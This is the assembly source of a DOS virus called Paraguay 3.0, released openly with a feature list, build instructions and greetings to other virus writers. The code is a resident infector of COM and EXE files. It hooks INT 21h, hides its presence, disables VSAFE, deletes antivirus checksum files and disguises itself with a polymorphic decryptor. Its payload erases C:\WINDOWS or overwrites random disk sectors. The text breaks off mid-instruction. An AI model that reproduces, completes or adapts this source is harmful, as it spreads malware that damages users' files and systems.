Comment # ßÛßßßßßÜ ßÜ Üß Ü ÜÜÜÜ Ü Ü Üßßß Û Û Û Û Û ÛÜß Û Û ßßÛ Û Û ß ß Û Û ßß ßßß ÛÜÜÜÜÜß ÜÜÜ Ü ÜÜ ÜÜÜ ß Ü Ü ÜÜÜ Ü Ü Û Û Ûß Û ÜßßßÜ Û Û Û Û Û Û ÜßßÛ Û ÜßßÛ Û Û Û Û ÜßßÛ ßÜÜÛ ÜÛÜ ßÜÜÛÜ Û ßÜÜÛÜ ßÜÜÜÛ ßÜÜß ßÜÜÛÜ Û ßßÜ ÜßßÜ Û Û ßÜ Û Û ßÜÜß ßÜÜß ßß ß ßß ÄÄÄÄÄÄÄÄÄ Ä Ä ú Coded by Int13h in Paraguay, South America ú Ä Ä ÄÄÄÄÄÄÄÄÄ Characteristics ÍÍÍÍÍÍÍÍÍÍÍÍÍÍ * Appending COM/EXE infector. COMs > 666 and < 60000 bytes * Resident using Memory Control Block (MCB), hooks INT 21h. * Fast infector. Infects on open, execution, rename, extended open and get/change attributes. * Doesn't reinfect memory or files. * Directory and Handle stealth. Hides virus-size on ah=11h/12h/4eh/4fh. * Turns off VSAFE's flags while analyzing or infecting files. When the dirty work is finished, the flags are returned, except of the 'Write Protect' one, coz caches may make troubles. * Time Stealth (AX=5700h and 5701h), returns correct seconds and prevents any program from setting normal seconds to an infected file. * Handler Stealth (AX=2521H and 3521H), returns previous handler for INT 21h when someone requests it, and when any program wants to get control over INT 21h, it sets it as second handler, this way, the virus is always first at INT 21h. * Gets INT 21h vector tracing the Progam Segment Prefix (PSP), and if it finds it, it uses this one, otherwise it uses INT 21h normally. * Deactivates trap flag and INT 01h, in order to avoid tunneling on any int we hook. * On May (Paraguayan's independence day), if we get a random byte over 200, the virus dels every file and subdirectories on stinky and filthy C:\WINDOWS, setting it as an alternative entrance to DOS (from old CP/M). * It dels ANTI-VIR.DAT, CHKLIST.CPS, CHKLIST.MS and AVP.CRC in the dir where files are infected. * Files infected are set to 60 seconds. * Doesn't infect files ended with AN,AV,OT,RD,RU,IT,VP,SK,IP,RJ,AR,HA so we dont have probs with suckers. Whenever it detects an execution of any file with these endings, it deactivates stealth. Then there are no problems with compressing programs (pkzIP, aRJ, rAR, lHA) and various AV's. Whenever the program terminates its execution (AH=4Ch/int 21h or INT 20h) it reactivates stealth. * Sets its own code for handling Errors. * Avoids infecting immunized files (CPAV) and DOS 7.0 .COM's. * There's no viral activity if Novell Network is detected. * It doesn't infect WINSLOWS .EXE files. * It doesn't infect with a different length from that specified on the header (overlayed .EXE's). * Maintains Date + Time (sets seconds to 60 ;-). * Returning control to .COM tries to infect COMMAND.COM. Returning contorl to .EXE verifies the payload condition. * Opens files in 'Read Only' mode, and manipulates the System File Table to change to 'Read/Write' mode, save attribs and set them to normal. It also resets the pointer. * Kinda polymorphic, with random regs selection and garbage adding in the decryptor. The opcodes table changes on each infection. Ä TO COMPILE IT ( I TASM, so I am ) * tasm parag-30.asm /m3 * tlink parag-30.obj Greetz - Greetz - Greetz - Greetz - Greetz - Greetz - Greetz - Greetz Methyl : hello prince of tunneling! Superx : a mov ax,04202h takes in your code just a nibble :) Tcp : your disassemblies rock Mister Sandman: Metallica rulesss X-DDDD Sepultura : come back to da scene, mate. GriYo : disinfection-on-the-fly equ desinfectar-a-la-mosca ;-) Jacky Qwerty : you can infect even a particle acelerator :) Drako [DAN] : holas. no funciona :-( Saludos! Also greetz to the gods: Vyvojar, F3161, Neurobasher, Masud & Dark Avenger. # .Model Tiny .Code ; .Pseudocode would be better hehehe Org 0h ; Yes, yes, yes; It's an EXE Longitud equ (offset FakeHoste-offset Paraguay) Largor equ (offset Omega-Offset Paraguay) VirusEnPara equ (Largor+15)/16 Saltarlos equ (offset Jeroglifico-offset Paraguay) Cripted equ ((offset Omega-offset Jeroglifico)/2) ParraVir1 equ ((Longitud+15)/16)+1 ParraVir2 equ ((Longitud+15)/16) Paraguay: db 18 dup (090h) ; Buffer call Paso1 ; Delta Offset Paso1: nop pop bp Paso2: sub bp,offset Paso1 ; In BP goes delta (variable) Junk02: db 8 dup (090h) ; In all labels Junk, garbage. Paso3: mov bp,bp ; Used registers are selected Junk03: db 4 dup (090h) ; randomly by the rnd code. push cs ; DS:=CS pop ds Junk04: db 12 dup (090h) Paso4: lea si,[bp+offset Jeroglifico] ; Index Register is variable Junk05: db 6 dup (090h) Paso5: db 081h,0c6h,0,0 ; ADD SI,0000 Junk06: db 10 dup (090h) Paso6: push si ; Stack return address Junk07: db 4 dup (090h) ; so RET jumps there. Paso7: mov cx,Cripted/2 ; CX value is divided Junk08: db 8 dup (090h) Paso8: add cx,Cripted/2 Junk09: db 6 dup (090h) Desencriptor: ; Hence the decryptor #:) Paso9: db 081h,034h ; XOR WORD PTR [SI],CLAVE Clave dw 0 Junk10: db 14 dup (090h) Paso10: inc si ; It may be SI,DI or BX inc si Junk11: db 4 dup (090h) ; Waste, waste, waste... Loop Desencriptor Junk12: db 8 dup (090h) ret ; Jumps into decryted or RETurns. Junk13: db 16 dup (090h) ; It's needless, but just i put it. Jeroglifico: ; Encrypted Virus push es ; Replace DS, in case it is an EXE pop ds ; DS:=ES mov ah,2 ; TBCLEAN intended. int 16h mov ax,0db00h ; Verify whether NETX.EXE int 21h ; from Novell Network is or al,al ; resident. jz NoHayNovell jmp MemoriaYaPodrida ; If Novell's there, dont infect. NoHayNovell: mov ax,0cd13h ; Hell Good Interruption! ;) int 21h cmp ax,013cdh ; Residency test. jne Instalar ; Load virus into memory. jmp MemoriaYaPodrida Instalar: ; Reserve room in push es ; "R.A.M." Hotel :) mov ax,3521h ; Old INT 21h handler. int 21h mov cs:[bp+word ptr Abuela21h],bx mov cs:[bp+word ptr Abuela21h+2],es mov cs:[bp+word ptr Real21h],bx ; In case PSP tracing fails. mov cs:[bp+word ptr Real21h+2],es mov ax,3520h ; Old INT 20h handler. int 21h mov cs:[bp+word ptr Interrupcion20h],bx mov cs:[bp+word ptr Interrupcion20h+2],es push ds ; Data Segment to stack lds bx,ds:[0006h] ; Search for original INT 21h Tracear:cmp byte ptr ds:[bx],0eah ; handler in PSP. jne Chekear ; Thanks Satan's Little Helper lds bx,ds:[bx+1] cmp word ptr ds:[bx],9090h ; Search for double NOP jnz Tracear sub bx,32h cmp word ptr ds:[bx],9090h ; " " " " jne Chekear Hallado:mov cs:[bp+word ptr Real21h],bx ; Save found address mov cs:[bp+word ptr Real21h+2],ds jmp short MCBTSR Chekear:cmp word ptr ds:[bx],2e1eh jnz MCBTSR add bx,25h cmp word ptr ds:[bx],80fah je Hallado MCBTSR: pop ds ; Unload Data Segment from stack mov ax,ds ; Get resident using dec ax ; <----- MCB mov es,ax mov ax,es:[3] ; Memory sub ax,ParraVir1 ; Substract virus length xchg bx,ax ; in paragraphs (16 bytes) push ds ; ES:=DS pop es mov ah,4ah ; Free unused memory int 21h mov ah,48h ; Allocate memory mov bx,ParraVir2 int 21h dec ax mov es,ax mov word ptr es:[1],8 ; Virus? Nope... its DOS ;) mov word ptr es:[8],'PY' ; Block's name: PY (Paraguay) inc ax mov es,ax xor di,di push cs ; Copy virus to free segment pop ds lea si,[bp+offset Paraguay] ; From the begining mov cx,Longitud ; CX bytes rep movsb int 03h ; 4 DEBUG! xor ax,ax mov ds,ax ; DS:=0 mov dx,offset Maldita21h ; Gets INT 21h directly mov word ptr ds:[21h*4],dx ; modifying the IVT mov ds:[21h*4+2],es mov dx,offset Inty20h ; Gets INT 20h mov word ptr ds:[20h*4],dx mov ds:[20h*4+2],es pop es ; Extra Segment saved MemoriaYaPodrida: cmp byte ptr [bp+ComOexe],'C' ; What are we infecting? je CorrerCOM mov ah,2ah ; System's date. int 21h cmp dh,05 ; Independence month!! jne SigaNomas in ax,40h ; Trivial Randomic Generator. cmp al,200d jb SigaNomas push cs ; DS:=CS pop ds mov ah,03bh lea dx,[bp+Offset WindoSucks] ; Enter the directory int 21h jc LittleDamage ; Error Hmmm Lets fuck it anyway! ;) lea ax,[bp+offset ImprimirCadena] push ax ; Stack Return Address push cs ; Our Code Segment pushf ; And the flags mov cl,13h ; Delete using FCB (Function in cl) lea dx,[bp+offset FCBTrucho] ; The diabolic table sub ax,ax ; 0 Segment push ax mov ax,00c0h ; Offset 0c0h = alternative entrance push ax retf ; Jmp there! LittleDamage: in ax,40h xchg dx,ax xor dh,dh ; Just between the first 0xff sectores mov al,2 ; Drive C: mov cx,2 ; Smashs two random sectors int 26h ImprimirCadena: ; Social Presentation push cs pop ds mov ah,9 ; Print Copyright lea dx,[bp+offset CopyWrong] int 21h xor ax,ax ; It even pauses! :) int 16h SigaNomas: push es ; Correct Data Segment pop ds mov bx,bp ; F-Prot's guilty for this mov ax,es add ax,10h ; Because of the PSP add cs:[(bx+CS_IP)+2],ax cli ; Stop ints add ax,cs:[(bx+SS_SP)+2] mov ss,ax ; Its stack segment mov sp,cs:[bx+SS_SP] ; and its stack pointer sti ; Free ints call Limpiar ; Reinitialize registries db 0ebh,0h ; Free the prefetch queue db 0eah ; Jump to EXE's CS:IP CS_IP dw offset FakeHoste,0h SS_SP dw 0,0 ; Its SS:SP CorrerCOM: call Segmentos mov ah,56h ; Rename! Hehe, just to infect lea dx,[bp+offset CommandCom] ; COMMAND.COM, making sure we mov di,dx ; get on memory early each day in int 21h ; the morning. lea si,[bp+offset Vafer] ; Its original bytes... mov di,100h push di ; 100h to stack cld movsb ; Return its old bytes. movsw Limpiar:xor ax,ax xor bx,bx xor cx,cx ; Clean registers xor dx,dx xor si,si xor di,di xor bp,bp ret ; Run COM or return to caller Stealth_Segundos2: push dx push cx ; Saves originals mov ax,5700h ; Get date & time of the given handle pushf call dword ptr cs:[Real21h] and cl,00011111b cmp cl,00011110b ; ¨60 seconds? ¨Infected? jne Tranquilopa pop cx and cl,11100000b ; Marks as infected or cl,00011110b ; 30*2=60! push cx Tranquilopa: pop cx pop dx mov ax,5701h ; Set the date & time pushf call dword ptr cs:[Real21h] iret Stealth_Segundos1: pushf call dword ptr cs:[Real21h] ; Do the real int push cx and cl,00011111b cmp cl,00011110b ; ¨60 seconds? jne NoPasaNada pop cx and cl,11100000b ; Erase erronous infect mark or cl,1 ; 1*2=2 seconds push cx NoPasaNada: pop cx iret Maldito_Jump2: ; Worst opcodes are those short jmp Stealth2 ; jumps of 128 bytes! :-( Maldito_Jump3: jmp Analizar ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Maldita21h: Its the INT 21h handler set by Paraguay 3.0 ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Maldita21h proc far ; My INT 21h push ds push si push ax ; Saving the registers I'll use. push bx pushf pop ax ; Get flags into AX and ah,11111110b ; Zero out Trap Flag used for push ax ; tunneling popf ; And load modified flags from AX sub ax,ax mov ds,ax ; DS:=0 = IVT mov bx,4 ; 0000:0004 = Int 1h handler lds si,[bx] ; DS:SI = " " " mov bl,byte ptr [si] ; Handler's first byte in bl mov byte ptr [si],0cfh ; That is an InterruptionRETurn pop bx pop ax ; Restore registers pop si pop ds cmp ax,0cd13h ; Memory Check je Chequeo cmp ax,03521h ; Hide Int21h je Ocultar21h_A cmp ax,02521h ; Protect Int21h je Ocultar21h_B cmp ax,05700h ; Hide wrong secs je Stealth_Segundos1 cmp ax,05701h ; Protect wrong secs je Stealth_Segundos2 cmp ah,11h ; FCB finding first je Stealth1 cmp ah,12h ; FCB finding next je Stealth1 cmp ah,4eh ; Finding first je Maldito_Jump2 cmp ah,4fh ; Finding next je Maldito_Jump2 cmp ah,04bh ; Program execution je Maldito_Jump3 cmp ah,056h ; Rename files je Maldito_Jump3 cmp ah,043h ; Get/Set attribs je Maldito_Jump3 cmp ah,3dh ; Open je Maldito_Jump3 cmp ax,6c00h ; Extended Open je Maldito_Jump3 cmp ah,4ch ; Program end... je SalidaProg db 0eah ; Normal INT, uninteresting :) Abuela21h dw 0,0 Chequeo:xchg ah,al ; Yes!!!! Here we are. iret Maldita21h endp SalidaProg: ; Int 21h/4Ch to end the program mov byte ptr cs:[HacerStealth],1; Set stealth flag jmp dword ptr cs:[Abuela21h] Inty20h: ; Int 20h ending (4 some old COMs) mov byte ptr cs:[HacerStealth],1; Set stealth flag db 0eah Interrupcion20h dw 0,0 Ocultar21h_A: mov bx,cs:[word ptr Abuela21h] ; Old handler into ES:BX mov es,cs:[word ptr Abuela21h+2] iret Ocultar21h_B: mov cs:[word ptr Abuela21h],dx ; Set DS:DX as second handler mov cs:[word ptr Abuela21h+2],ds; in the chain. iret ; Viruses first ;) ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Stealth1: Edit File Control Block size to hide the al virus ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Stealth1: ; FCB stealth pushf call dword ptr cs:[Abuela21h] or al,al ; al = 0? jne ErrorDir ; Puaj! Error :-( push ax push bx ; Save this regs into the stack push es mov ah,62h ; PSP: where is it? int 21h mov es,bx cmp bx,es:[16h] ; Correct PSP? jne Fuera ; Nope, chau. mov bx,dx ; Points to original FCB in the PSP mov al,[bx] push ax ; Save AX for later comparison mov ah,2fh ; In ES:BX there is DTA's address int 21h pop ax ; Reget AX (AL=ffh or AL=1) inc al ; Which FCB-type? jne FCBComun add bx,7 ; Its extended, turn it normal FCBComun: mov al,byte ptr es:[bx+17h] ; True Seconds... and al,00011111b cmp al,00011110b ; 60 seconds? jne Fuera cmp word ptr es:[bx+1dh],(Largor+200) ja Sustraer ; If greater than virus, substract. cmp word ptr es:[bx+1fh],0 ; Too small as to be infected je Fuera Sustraer: sub word ptr es:[bx+1dh],Largor sbb word ptr es:[bx+1fh],0000 ; Substract virus size or byte ptr es:[bx+17h],1 ; Hide the seconds Fuera: pop es ; Pop modified regs pop bx pop ax ErrorDir: retf 2 ; IRET maintaining flags ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Stealth2: Edit Disk Transfer Area size to hide the virus ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Stealth2: ; Handle stealth pushf call dword ptr cs:[Abuela21h] jc Demonios ; If carry is set...­ERROR! cmp byte ptr cs:[HacerStealth],0; Is stealth off? je Demonios pushf push ax push es push bx mov ah,2fh ; DTAddress int 21h ; in ES:BX mov ax,es:[bx+16h] ; Unhide the seconds and al,00011111b cmp al,00011110b ; 60 segundos? jne Paso cmp word ptr es:[bx+1ah],(Largor+200d) jb Paso ; Verify size sub word ptr es:[bx+1ah],Largor ; Substract virus sbb word ptr es:[bx+1ch],0000 or byte ptr es:[bx+16h],1 ; Hide seconds Paso: pop bx pop es pop ax popf Demonios: retf 2 ; RETurn ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Manejador24h: Pseudo-error-handler, so as to avoid write protect errors ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Manejador24h proc near ; Dumb critic error handler mov al,03 iret ; -It's nothing, officer... Manejador24h endp Maldito_Jump4: ; 128 byte shit junk jmp PopAll SoloPopear: jmp JustPOPs ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Analizar: Analize and eventual infection of file given in DS:DX ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Analizar: ; Examine victim pushf push ax push bx push cx push dx push si push di push ds push es cmp ax,6c00h ; Special case DS:SI jne No_Apertura_Extendida cmp dx,0001 ; Standard open jne SoloPopear mov dx,si ; Now its DS:DX also No_Apertura_Extendida: push ax push dx ; V¡ctim push ds mov ax,3524h ; Int 24h Handler int 21h mov word ptr cs:[Vieja24h],bx mov word ptr cs:[(Vieja24h)+2],es push cs pop ds mov ax,2524h ; Pipe it mov dx,offset Manejador24h int 21h mov ax,0fa02h ; Turn off VSAFE's flags mov dx,5945h ; mov bl,00000000b ; New flags = 0 int 21h mov byte ptr cs:[Vsuck],cl ; Save flags for later pop ds ; Candidate in DS:DX pop dx push ds pop es pop ax cld mov di,dx mov cx,128 mov al,'.' ; Search jumping . repne scasb jne Maldito_Jump4 push ax mov ax,word ptr es:[di-3] ; Dont infect undesirable! or ax,02020h cmp ax,'na' ; scAN / cleAN / tbscAN / tbcleAN je Actuar cmp ax,'va' ; tbAV / nAV je Actuar cmp ax,'to' ; fool-prOT je Actuar cmp ax,'dr' ; guaRD je Actuar cmp ax,'ur' ; findviRU je Actuar cmp ax,'ti' ; toolkIT je Actuar cmp ax,'pv' ; aVP je Actuar cmp ax,'ks' ; chkdSK je Actuar cmp ax,'pi' ; pkzIP je Actuar cmp ax,'jr' ; aRJ je Actuar cmp ax,'ra' ; rAR je Actuar cmp ax,'ah' ; lHA je Actuar pop ax jmp short IsNotEvilSoft Actuar: pop ax cmp ah,04bh ; Will junk be exec'ed? jne Maldito_Jump5 mov byte ptr cs:[HacerStealth],0; Turn stealth off jmp short Maldito_Jump5 IsNotEvilSoft: xchg si,di ; Check ext lodsw or ax,2020h ; Uncapitalize cmp ax,'oc' ; .CO? jne VerEXE3 lodsb or al,20h cmp al,'m' ; .COM? je Label3 Maldito_Jump5: jmp PopAll ; Abort mission VerEXE3:cmp ax,'xe' ; .EX? jne Maldito_Jump5 lodsb or al,20h cmp al,'e' ; .EXE? jne Maldito_Jump5 Label3: mov ax,3d00h ; Open host in read-only pushf ; mode call dword ptr cs:[Real21h] jc Maldito_Jump5 xchg bx,ax ; Handle into BX mov word ptr cs:[Handle],bx push cs pop ds mov ax,4301h ; Get ANTI-VIR.DAT attrib naked mov dx,offset Basura1 sub cx,cx pushf ; Call handler directly call dword ptr cs:[Real21h] mov ah,41h ; mov dx,offset Basura1 int 21h mov ah,41h ; Chau CHKLIST.MS mov dx,offset Basura2 int 21h mov ah,41h ; C ya CHKLIST.CPS mov dx,offset Basura3 int 21h mov ah,41h ; Good luck AVP.CRC mov dx,offset Basura4 int 21h mov ax,5700h ; Time and Date please pushf ; Call handler directly call dword ptr cs:[Real21h] mov word ptr cs:[Time],cx mov word ptr cs:[Date],dx and cl,00011111b cmp cl,00011110b ; 30*2= ¨60? jne Conti ; Already infected? jmp Maldito_Jump6 Conti: call Segmentos ; Set working segments mov ah,3fh ; Read from the beginning mov cx,45d ; 45 bytes to our buffer mov dx,offset Cabecera int 21h mov si,dx ; Is it a True EXE? cmp word ptr [si],'ZM' je InfectarEXE cmp word ptr [si],'MZ' ; Other way je InfectarEXE InfectarCOM: ; Notice .COM files push bx ; Save handle mov ah,30h int 21h pop bx ; And restore it here ;) cmp al,7 ; Dare not touch the COMs jae Maldito_Jump6 ; from DOS 7 or above call AlFinal cmp ax,60000d ; Check size ja Maldito_Jump6 cmp ax,029Ah ; Hi there spanish pals ;-) jbe Maldito_Jump6 cmp word ptr [si+11d],'TW' ; CPAV immunized? je Maldito_Jump6 mov byte ptr [COMoEXE],'C' ; Mark as .COM mov di,offset Vafer ; which we will write into 100h after movsb movsw sub ax,3 ; JMP mov word ptr [Salto+1],ax call HIPOCRESIA ; Change the face. ­HIPOCRITE! ;) mov bx,[Handle] ; Handle in BX call Manipular_SFT ; Modify SFT info mov ah,40h mov cx,Largor mov dx,offset CopiaVir int 21h ; ADD file,virus mov word ptr es:[di+015h],00 ; Pointer to the beginning SFT mov word ptr es:[di+017h],00 mov ah,40h ; Write the JMP mov cx,3 mov dx,offset Salto int 21h inc word ptr [Contador] ; One more ;) mov cl,byte ptr [Atributos] ; Return its original attribs mov byte ptr es:[di+4],cl call PongoFecha ; Restore date and time Maldito_Jump6: jmp Cerrar ; Close and go InfectarEXE: ; Notice .EXE cmp word ptr [si+018h],0040h ; If Windoze let it rot jae Maldito_Jump6 cmp word ptr [si+01ah],0000 ; Overlay? jne Maldito_Jump6 cmp word ptr [si+43d],'TW' ; Sucked with CPAV's code? je Maldito_Jump6 call AlFinal mov cx,512d ; See if not overlayed div cx or dx,dx ; Is multiple? je NoHayResto inc ax NoHayResto: cmp word ptr [si+02h],dx ; Do partial page bytes match? jne Maldito_Jump6 cmp word ptr [si+04h],ax ; Total page bytes match jne Maldito_Jump6 ; real size? mov byte ptr [COMoEXE],'E' ; EXE marked call AlFinal push dx ; Size push ax les ax,dword ptr [(Cabecera+014h)] mov [CS_IP],ax ; The world-wide known CS:IP and the mov [(CS_IP+2)],es ; not less well-known SS:SP les ax,dword ptr [(Cabecera+0eh)] mov word ptr [SS_SP],es ; CS:IP (Intel Reversed Word Format) mov word ptr [(SS_SP+2)],ax ; SS:SP (Non " " " " ) mov ax,word ptr [(Cabecera+08h)] mov cl,4 shl ax,cl xchg bx,ax pop ax ; Pop size pop dx push ax push dx ; Repush sub ax,bx sbb dx,0 mov cx,10h div cx ; Turn into segmented style mov word ptr [(Cabecera+014h)],dx mov word ptr [(Cabecera+016h)],ax mov word ptr [(Cabecera+0eh)],ax mov word ptr [(Cabecera+010h)],0 pop dx ; Pop size one more time pop ax add ax,Largor ; Host+Virus size adc dx,0 mov cl,9 push ax shr ax,cl ror dx,cl or dx,dx ; Garbage stc adc dx,ax pop ax and ah,1 mov word ptr [(Cabecera+4)],dx mov word ptr [(Cabecera+2)],ax mov ax,word ptr [(Cabecera+0ah)]; MinAlloc clc add ax,VirusEnPara jc NoAgregarMemoria ; If carry dont add mov word ptr [(Cabecera+0ah)],ax NoAgregarMemoria: ; MaxAlloc, underneath mov word ptr [(Cabecera+0ch)],0ffffh call HIPOCRESIA ; Change yer face. ­HIPOCRITE! mov bx,[Handle] call Manipular_SFT mov ah,40h mov cx,Largor ; Stack virus at the end mov dx,offset CopiaVir int 21h mov word ptr es:[di+015h],00 ; Set pointer to start simply by mov word ptr es:[di+017h],00 ; resetting the pos set in SFT mov ah,40h ; Write header at the beginning mov cx,01ah mov dx,offset Cabecera int 21h inc word ptr [Contador] ; Another one for the list mov cl,byte ptr [Atributos] ; Return Original Attribs mov byte ptr es:[di+4],cl call PongoFecha ; Restore Date and Time set Cerrar: mov ah,3eh ; Close file int 21h PopAll: push cs pop ds mov ds,word ptr [Vieja24h+2] mov dx,cs:word ptr [offset Vieja24h] mov ax,2524h int 21h ; Restore Error Handler mov ax,0fa02h ; Before ending, clean tracks mov dx,5945h ; Restore VSAFE's flags mov bl,byte ptr cs:[Vsuck] and bl,11111011b ; Turn off write-protected flag int 21h ; (cache stuff) JustPOPs: pop es ; Pop all regs pop ds ; pop di pop si pop dx pop cx pop bx pop ax popf jmp dword ptr cs:[Abuela21h] Contador dw 0 ; Infection counter CopyWrong db 'VIRUS PARAGUAY Ver. 3.0!$ Programmed by Int13h,' db ' in Paraguay, South America.' Basura1 db 'ANTI-VIR.DAT',0 ; Computer disgraces Basura2 db 'CHKLIST.MS',0 Basura3 db 'CHKLIST.CPS',0 Basura4 db 'AVP.CRC',0 CommandCom db 'C:\COMMAND.COM',0 ; To infect this sucker WindoSucks db 'C:\WINDOWS',0 ; I'm about to vomit! Puuuaaaaj!! Salto db 0e9h,00h,00h ; Initial jump at beginning of COM Vafer db 090h,0cdh,020h ; The three original COM bytes Cinco db 5 ; So as to randomize decryptor's CX ComOexe db 'E' ; The mark FCBTrucho db 0ffh ; The FCB table to delete db 5 dup(0) ; WINDOWS dir db 1fh ; with all its files and subdirs db 3 ; no matter their attribs. db '???????????' db 19h dup(0) Real21h dw 0,0 ; Real 21h handler ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Manipular_SFT: Modify opening mode of file and save/change attribs ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Manipular_SFT: push bx mov ax,1220h ; Get Job System Table int 2fh ; in ES:DI mov ax,1216h ; Now the File System Table xor bh,bh ; for our handle in ES:DI mov bl,es:[di] int 2fh mov cl,byte ptr es:[di+4] ; Manipulate SFT mov byte ptr [Atributos],cl ; Get attribs mov byte ptr es:[di+4],20h ; Attrib = 20h = file mov byte ptr es:[di+2],2 ; Read/write access pop bx ret Maldito_Jump7: ; Must I say something about jmp Muto7 ; 128 byte-jumps still??? :) Maldito_Jump8: jmp Muto6 Maldito_Jump9: jmp Muto5 Maldito_Jump10: jmp Muto4 ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! HIPOCRESIA: Mute decryptor opcode x opcode. Copy heap (between others) ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ HIPOCRESIA: call segmentos DamePalabraRandomica: in ax,40h ; Encryption key or ax,ax je DamePalabraRandomica mov [Clave],ax in ax,40h ; Random number from port 40h mov dx,ax cmp al,36 ; Regs selector jb Maldito_Jump7 ; with which we'll work cmp al,72 ; in the decryptor. jb Maldito_Jump8 ; This is the beginning, that is cmp al,108 ; where IP which CALL left jb Maldito_Jump9 ; on the stack will get popped cmp al,144 ; and this way get the delta offset jb Maldito_Jump10 ; that goes into BP cmp al,180 jb Muto3 cmp al,216 jb Muto2 Muto1: mov bx,offset Paso1 ; Mute, mute, mute y mute. mov [bx],0582fh ; DAS / POP AX mov bx,offset Paso2 mov [bx],02d90h ; NOP / SUB AX mov bx,offset Paso3 cmp dl,85d jb Little1 cmp dl,170d jb Little12 mov [bx],0c589h ; MOV BP,AX jmp Sigo Little1:mov [bx],0fb95h ; STI / XCHG BP,AX jmp Sigo Little12:mov [bx],0c587h ; XCHG AX,BP jmp Sigo Muto2: mov bx,offset Paso1 mov [bx],05ef5h ; CMC / POP SI mov bx,offset Paso2 mov [bx],0ee81h ; SUB SI mov bx,offset Paso3 cmp dl,85d jb Little2 cmp dl,170d jb Little22 mov [bx],0f589h ; MOV BP,SI jmp Sigo Little2:mov [bx],0ee87h ; XCHG BP,SI ­Theyre different opcodes! jmp Sigo Little22:mov [bx],0f587h ; XCHG SI,BP Thats why we get both jmp Sigo Muto3: mov bx,offset Paso1 mov [bx],0593fh ; AAS / POP CX mov bx,offset Paso2 mov [bx],0e981h ; SUB CX mov bx,offset Paso3 cmp dl,85d jb Little3 cmp dl,170d jb Little32 mov [bx],0cd89h ; MOV BP,CX jmp Sigo Little3:mov [bx],0e987h ; XCHG BP,CX jmp Sigo Little32:mov [bx],0cd87h ; XCHG CX,BP jmp Sigo Muto4: mov bx,offset Paso1 mov [bx],05b27h ; DAA / POP BX mov bx,offset Paso2 mov [bx],0eb81h ; SUB BX mov bx,offset Paso3 cmp dl,85d jb Little4 cmp dl,170d jb Little42 mov [bx],0dd89h ; MOV BP,BX jmp Sigo Little4:mov [bx],0eb87h ; XCHG BP,BX jmp Sigo Little42:mov [bx],0dd87h ; XCHG BX,BP jmp Sigo Muto5: mov bx,offset Paso1 mov [bx],05fcch ; INT 3 / POP DI mov bx,offset Paso2 mov [bx],0ef81h ; SUB DI mov bx,offset Paso3 cmp dl,85d jb Little5 cmp dl,170d jb Little52 mov [bx],0fd89h ; MOV BP,DI jmp Sigo Little5:mov [bx],0ef87h ; XCHG BP,DI jmp Sigo Little52:mov [bx],0fd87h ; XCHG DI,BP jmp Sigo Muto6: mov bx,offset Paso1 mov [bx],05df8h ; CLC / POP BP mov bx,offset Paso2 mov [bx],0ed81h ; SUB BP mov bx,offset Paso3 ; 2 garbage bytes mov cx,1 call Ygramul Muto7: mov bx,offset Paso1 mov [bx],05af9h ; STC / POP DX mov bx,offset Paso2 mov [bx],0ea81h ; SUB BX mov bx,offset Paso3 cmp dl,85d jb Little7 cmp dl,170d jb Little72 mov [bx],0d589h ; MOV BP,DX jmp short Sigo Little7:mov [bx],0ea87h ; XCHG BP,DX jmp short Sigo Little72:mov [bx],0d587h ; XCHG DX,BP Sigo: xor ax,ax ; So that CX is more randomic in al,40h mul byte ptr Cinco cmp ax,Largor ja Sigo ; Must be less than wanted value xchg cx,ax mov ax,Largor sub ax,cx mov bx,(offset Paso7+1) ; On their marks mov [bx],ax mov bx,(offset Paso8+2) mov [bx],cx sub ax,ax ; Divide the address from which in al,40h ; we'll start the decryption xchg cx,ax mov ax,offset Jeroglifico sub ax,cx mov bx,(offset Paso4+2) ; Write values into memory mov [bx],ax mov bx,(offset Paso5+2) mov [bx],cx in al,40h cmp al,85 jb Cambia3 ; Select index register cmp al,170 jb Cambia2 mov bx,offset Paso4 ; LEA SI,[BP+XX] mov [bx],0b68dh mov bx,offset Paso5 mov [bx],0c681h ; ADD SI,XX mov bx,offset Paso6 mov [bx],0b956h ; PUSH SI / MOV CX mov bx,offset Paso9 mov [bx],03481h ; XOR WORD PTR [SI] mov bx,offset Paso10 test al,3 ; Use other way jz MasPoly mov [bx],04646h ; INC SI / INC SI jmp AlBuffer MasPoly:mov [bx],0acach ; LODSB / LODSB jmp AlBuffer Cambia2:mov 